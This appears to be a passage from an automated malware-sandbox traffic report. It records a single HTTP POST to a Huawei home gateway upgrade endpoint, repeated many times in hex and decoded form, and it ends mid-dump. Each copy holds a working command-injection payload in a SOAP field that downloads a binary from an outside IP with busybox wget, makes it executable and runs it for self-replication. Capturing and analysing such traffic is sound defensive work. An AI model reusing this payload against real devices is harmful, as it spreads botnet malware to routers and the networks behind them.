73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 